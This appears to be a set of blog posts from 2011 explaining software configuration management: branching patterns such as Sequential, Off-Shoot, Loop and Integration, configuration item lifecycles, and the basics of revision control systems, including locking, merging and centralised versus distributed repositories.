Branching is the (apparent) duplication of an artefact, or set of artefacts, so that they can be developed independently of the main development activity. Branching is a facility of all revision control systems. RCS systems incorporate mechanisms (such as lazy copying) to avoid the potentially massive overhead of copying artefacts between branches. Branches allow parallel development, which is essential in all but the most simple of software developments.

Conceptually, the artefacts that make up a product or system form the main branch or trunk of the development. The trunk represents the main line of development for the product. Ideally, the trunk represents the most recent (working) configuration of the project. Branches represent alternative paths of development. Motivations for branching include:

  • Maintenance of released products
  • Customer specific additions or modifications
  • New development work
  • Research and development projects

Note, with branching the unique identifier of an artefact must be extended to include the artefact’s branch. Thus artefact MyDoc v1.1 will be extended to be (something like) \main\MyDoc v1.0, which will be different to \main\branch1\MyDoc v1.0. In this case \main identifies the trunk branch and \main\branch1 identifies the first branch from the trunk branch.

Uncontrolled branching can lead to major administrative issues (many companies have a RCS administrator simply to keep the repository ‘healthy’)

The branching patterns presented below are a systematic approach to version tree usage. They are design to reduce the complexity of repository branch management and allow effective project management.

 

Sequential

The Sequential branching pattern (Figure 15) is the simplest model – in that it contains no branching! In essence, it is a ‘pseudo-branching’ pattern.

All development is performed on the trunk branch. All development is linear; no parallel development can be supported. This pattern requires, and enforces mutually exclusive changes to artefacts. By default, this is the pattern followed by all artefacts.

 

image

Figure 15 – The ‘pseudo-branching’ pattern, Sequential.  There is no branching!

The Sequential pattern is fine for projects where there is no parallel development required and the current release always has the most up-to-date developments. In general, this restricts the pattern’s use to simpler projects.

 

Off-Shoot

The Off-Shoot branching pattern allows a legacy version (the mainline development) to have derivative and independent versions created.

 

image

Figure 16 – The off-shoot branching pattern

The off-shoot branch can be created retrospectively – that is, development on the trunk branch could be well advanced before the off-shoot branch is created. The off-shoot is never merged into another branch. Off-shoots may also have their own off-shoots.

Note that the main trunk is baselined before the offshoot is created.

 

Loop

The Loop branch pattern is a variation on the Off-Shoot pattern. The Loop pattern allows basic managed development.

 

image

Figure 17 – The Loop branching pattern

In this example the trunk branch represents the release branch. That is, all releases are from the main branch. New development is performed in an Off-Shoot branch (called \Dev BL 2.0 in the example since it represents the new code that will appear in baseline 2.0 of the product). The new development work is independent of any release code.

Once development has been completed in the Off-Shoot branch the Loop is closed by merging the off-shoot back into its parent branch. Note that baselines in the main branch only represent completed development activities.

 

Integration

The Integration pattern extends the Loop pattern model to allow managed and concurrent development.

 

image

Figure 18 – the Integration branching pattern

As above, the main trunk branch represents the release branch for the code; no development is performed on the main branch.

For a new feature a new branch is created (\Integration). The new development consists of three work packages. In this example Work Package 1 (\WBS1) must be completed before Work Package 3 (\WBS3) can be started.

Within the \Integration branch two new Loops are started (\WBS1and \WBS2). The work on both packages continues independently and in parallel. When Work Package 1 is complete it is merged into the \Integration branch. At this point Work Package 3 can be started, so a new branch is created from the \Integration branch (after baselining the \Integration branch – not shown). Some time later Work Package 2 is completed and merged into the \Integration branch. Finally Work Package 3 is complete and merged. To complete development the \Integration branch is merged back into the mainline development.

The Integration pattern builds on the smaller patterns to form a comprehensive branch/merge strategy. The strength of this pattern is the RCS archive reflects the development project plan.

Configuration Items

May 30th, 2011

A Configuration Item (sometimes referred to as a Computer System Configuration Item, or CSCI) is an artefact (hardware and/or software) that has an end-user purpose – that is, it contributes, in some way, towards the attributes of a system or product, or the development processes followed to produce the system or product. A Configuration Item (CI) is an artefact that is treated as a self-contained unit for the purposes of identification and change control. For example:

  • Specifications
  • Design models
  • Source code
  • Make files
  • etc.

Configuration Item identification

Configuration identification is the process of identifying the attributes and procedures that define every aspect of a configuration item.

Configuration identification performs three distinct roles:

Uniquely identifying each Configuration Item.

CIs are the artefacts to be controlled under Configuration Management. Each CI must be uniquely identified by name, version (revision) and location (on the file system).

Establishing a change policy

The CI’s change policy defines how the artefact is revision controlled; and whether that control changes during the lifetime of the project.

Establishing a review policy

Ideally, every artefact should be reviewed. Configuration identification establishes how the artefact will be reviewed and when it will be reviewed.

Configuration Identification must be performed prior to establishing any revision control system. All CI attributes and policies must be recorded in the project’s CM plan.

Configuration lifecycles

Configuration lifecycles define how an artifact is checked into and out of the revision control system. The configuration lifecycle defines the ‘life’ of one particular change, as it applies to that artifact (c.f. Change Management, below). The lifecycle is typically shown as a state transition diagram.

For any real project of any complexity a number of lifecycles will be required. Also note, an artefact’s lifecycle may change through the lifetime of the project. This is defined by the artefact’s change policy.

Listed below are a number of common configuration lifecycles.

‘Archive’ lifecycle

Archive artefacts are configuration items that are simply stored in the CM system. Archive artefacts are never modified once they exist. For example, the binary (download) file for a particular release.

 

image

Figure 8 – The Archive lifecycle
 
‘Basic CI’ lifecycle

The ‘Basic’ CI lifecycle (Figure 9) is for artefacts that must be archive and may be modified over time. For example, the Compiler used on the project may be updated over the course of the project’s lifetime.

image

Figure 9 – the Basic lifecycle

In addition, this lifecycle is used for artefacts that have not yet been released (see Release Management, below). Such items should be stored in the project’s RCS repository (for completeness) and should have their modification history recorded but these items do not need to be subject to stringent review or quality checks before being checked in.

‘Reviewed CI’ lifecycle

A ‘Reviewed’ Configuration Item must pass a review (peer or formal) before it can be checked back in (Figure 10). For example, a Requirements Specification.

This lifecycle is sometimes known as a Document lifecycle.

image

Figure 10 – The Reviewed CI (or Document) lifecycle

Any artefact that has been released from development, or originates from outside the development department should be subject to this lifecycle.

‘Software CI’ lifecycle

The Software CI lifecycle (Figure 11) is an extension to the ‘Reviewed CI’ lifecycle (above). In addition to being reviewed, a software CI should also pass Static Analysis testing; and pass Unit (component) tests; before being checked in.

 

image

Figure 11 – The software item lifecycle.

The Software CI lifecycle can be implemented in environments that demand very high software quality, for example safety-critical applications.

 

To get the most out of your Revision Control System each project artefact must be defined, with its usage, review policy and, perhaps most importantly, its change policy. This information gives the developer the information needed when an artefact has to change – what is required and who must be involved. Having effective configuration identification in place also ensures that the project’s artefacts retain their quality (at whatever level that quality is set)

Revision Control

May 23rd, 2011

What is Revision Control?

Revision control is the management of multiple revisions of the same unit of information. The focus is on controlling access to the artefact; and recording the history of changes.

Revision Control is variously known as version control, source control, source code management and several other titles.

Revision control has its roots in the management of engineering blueprints and paper documents. Today, any practical application of Revision Control requires the use of specialist software tools.

Artefact Identification

The core to revision control is the artefact. An artefact is a unique unit of information that may change over time (or not – some artefacts are deliberately unchanging – see below). Every revision-controlled artefact is identified by a unique name made up of:

Artefact Name

The artefact’s name represents a human-readable identifier. This is typically how the artefact is referred to during the development process. The Artefact’s name is constant – that is, it does not change.

Revision identifier

The revision identifier is used to track the history of the information. It is usually a number (e.g. 1.1); the highest number is the most recent version (revision)

image

Figure 1 – The artefact identifier reflects the name of the unit of information and its history

As the artefact is modified (revised) the revision identifier is incremented and a new entity is created (see Figure 1). Thus, artefact MyDoc v1.0 is a different entity to MyDoc v1.1 since it contains different contents. One of the principles of revision control is that this process is hidden from the user, and they only see the most recent version, unless they explicity choose to access the artefact’s history (by accessing a previous revision).

Problems with ‘file system’ Revision Control

The simplest form of revision control is to use the directory system on your computer. Each revision of a product is kept as a separate directory on the disk (Figure 2). This is a simple technique but is rarely very effective.

image

Figure 2 – Storing file revisions using a file system is rarely effective

Since few file systems have a history facility built in, each revision must result in the storage of multiple (complete) copies of each artefact.

Normally, using a file system as a repository implies using a networked file server. Most modern file systems will recognise that a file is open for edited and restrict access (see File Locking, below). However, to improve responsiveness most users will make a local copy of their ‘working files’. This can lead to a problem known as ‘Latest-write wins’. This means, if multiple developers copy the same file to modify it (usually in different ways) then each copy their modified file back to the server this can lead to the loss of any previous changes; and only the last developer to save has their revisions included. Clearly, to control access to each file requires careful management to ensure consistency. Such systems, requiring process and procedures to retain consistency are easy to abuse, particularly in the heat of the rush to delivery.

Another problem comes when artefacts are shared between systems; especially if each product will make different demands, and require different modifications, to the artefact.

Using your file system for source control is, at best, adequate for one-man projects.

Revision Control Systems

For anything more than trivial revision control (for example, with more than one developer) then a Revision Control System (RCS) is required.

A Revision Control System (also known as a Version Control System – VCS) is a piece of software that acts as an archive for artefacts. The RCS stores the latest version of the artefact and all revisions. The developer can take latest revision (often called the ‘tip’) or any named revision.

Typically, the RCS stores first version of artefact, plus changes between one revision and the next (known as ‘deltas’). Artefact version numbering is usually automatically performed by the tool.

Access control

To ensure integrity of artefact revisions access control is required. Typically this involves locking the file against changes.

Acquiring the lock is referred to as Checking Out.

Committing the change (releasing the lock) is referred to as Checking In.

There are two common methods for achieving access control: File locking and Revision Merging

File locking

In a file locking system only one developer has write access to the artefact (Figure 4). Other developers will have read-only access to the current (stored) version. The file is only available again once it is checked back in.

image

Figure 4 – File locking allows only one developer at a time to modify an artefact.

File locking avoids complex merges due to large-scale changes since only one developer has access to the file and the ‘merges’ are essentially the new changes made by the developer.

Because a file may be checked out for a significant time developers may be tempted to simply circumvent the system

Revision Merging

Most systems allow multiple check-outs of the same file (see Figure 5).

If the file is checked-out multiple times the first developer to check-in always succeeds.

image

Figure 5 – Revision merging allows multiple check-outs on an object

Subsequent check-ins must merge their changes into the current revision. For simple merges this may be performed automatically by the RCS software. More complex merges may (and typically do) require human intervention.


Revision Control System Configurations

Revision control systems are designed to allow multiple users to access and modify artefacts from any location, either locally or across a network. There are two basic configurations of RCS – centralised and distributed. Each has its own merits; and the choice of RCS depends on the type of project being developed.

Centralised database systems

In a centralised system there is one master reference copy of all artefacts (Figure 6). Clients access the artefacts by making copies of a subset of central archive. This subset is a ‘view’ on the repository known as a Workspace. The workspace acts as an additional form of access control. The client is free to modify any artefact within their workspace, but may not modify anything not in their workspace (in fact, it should not be visible to them). Workspaces allow CM Managers to restrict access of staff to only the artefacts that are relevant to them.

image

Figure 6 – In a centralised system clients view a subset of the central repository

Centralised systems are best suited to geographically-close, commercial development projects, keeping all the company’s artefacts (which comprise their intellectual property) in a central location (for ease of back-up, etc.).

Distributed database systems

In a distributed system each client’s workspace is a bona fide repository. Each client has a full copy of the archive, complete with all revisions (Figure 7). The client is free to modify the database as they see fit.

image

Figure 7 – Multiple versions of the archive exist in a distributed system

Copies of the archives are kept synchronised with periodic updates (known as patches) sent between each of the RCSs.

Distributed database systems are widely used for open source software development. They are well suited to developments that may be geographically distant and being modify according to widely differing requirements.

%d bloggers like this: